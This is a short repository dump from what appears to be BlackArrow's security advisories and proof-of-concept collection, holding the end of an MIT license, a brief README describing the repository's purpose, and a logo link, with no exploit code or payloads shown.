12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 |
4 |
5 | # Advisories & Proofs of Concept
6 | Our researchers at __BlackArrow__ often discover new and interesting vulnerabilities. In this repo we collect all of them, providing technical details and PoCs to replicate easily their findings.
7 |
8 | ## License
9 |
10 | All the code included in this project is licensed under the terms of the MIT license.
11 |
12 |
13 | #
14 |
15 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
16 |
--------------------------------------------------------------------------------
/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/blackarrowsec/advisories/91d2aaa3eee5b7984aaefe3c7f052e905a9ed4f9/logo.png
--------------------------------------------------------------------------------